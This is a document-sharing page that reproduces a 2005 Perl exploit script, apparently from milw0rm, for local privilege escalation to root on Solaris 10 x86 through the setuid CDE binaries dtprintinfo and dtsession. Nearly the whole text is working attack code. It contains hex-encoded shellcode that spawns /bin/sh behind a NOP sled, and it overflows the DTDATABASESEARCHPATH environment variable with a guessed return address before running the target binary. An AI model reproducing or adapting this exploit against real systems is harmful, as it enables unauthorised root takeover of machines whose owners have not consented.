Docstoc

Solaris 10 DtPrintinfoSession Local Root Exploit x86

Document Sample
Solaris 10 DtPrintinfoSession Local Root Exploit x86 Powered By Docstoc
					                                Solaris 10 DtPrintinfoSession Local Root Exploit x86   Page 1/2
  1    #!/usr/bin/perl
  2    #######################################################################
  3    #
  4    # Solaris 10 DtPrintinfo/Session Exploit (x86)
  5    #
  6    # EDUCATIONAL purposes only.... :−)
  7    #
  8    # by Charles Stevenson (core) <core@bokeoa.com>
  9    #
  10   # greetz to raptor for sharing this vulnerability and in no specific
  11   # order just want to show love for: nemo, andrewg, jduck, bannedit,
  12   # runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
  13   #
  14   # irc.pulltheplug.org (#social)
  15   # 0dd: much <3 & respect
  16   #
  17   # 10/12/05 − FF local root
  18   #
  19   #######################################################################
  20   #               PRIVATE − DO NOT DISTRIBUTE − PRIVATE                 #
  21   #######################################################################
  22
  23   #You can try lots of dt* suids.           I’m too lazy to code the loop ;−o
  24   $dtsuid = "dtprintinfo";
  25   #$dtsuid = "dtsession";
  26
  27   $sc = "\x90" x (511−108) .
  28
  29   # anathema <anathema@hack.co.za>
  30   "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04".
  31   "\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5e".
  32   "\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50".
  33   "\xb0\x8d\xe8\xe0\xff\xff\xff\x29\xc0".
  34   "\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb".
  35   "\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0".
  36   "\x88\x46\x19\x89\x46\x14\x89\x46\x0f".
  37   "\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51".
  38   "\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff".
  39   "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01".
  40   "\x01\x01\x01\x02\x02\x02\x02\x03\x03".
  41   "\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  42
  43   print "\n\n$dtsuid root exploit\n";
  44   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
  45   print "Written by Charles Stevenson <core\@bokeoa.com>\n\n";
  46
  47   # Clear out the environment.
  48   foreach $key (keys %ENV) { delete $ENV{$key}; }
  49
  50   # Setup simple env so ret is easier to guess
  51   $ENV{"HELLCODE"} = "$sc";
  52   $ENV{"TERM"} = "xterm";
Charles Stevenson                                                                      10/12/2005
                                  Solaris 10 DtPrintinfoSession Local Root Exploit x86   Page 2/2
  53   $ENV{"DISPLAY"} = "127.0.0.1:0";
  54   $ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";
  55
  56   # Create the payload...
  57   #$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
  58   $ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;
  59
  60
  61   # If you don’t get root try other dt setuid binaries
  62   print "Trying to own $dtsuid...\n";
  63   system("/usr/dt/bin/$dtsuid");
  64
  65   # EOF
  66
  67   # milw0rm.com [2005−10−12]




Charles Stevenson                                                                        10/12/2005

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:152
posted:5/24/2010
language:English
pages:2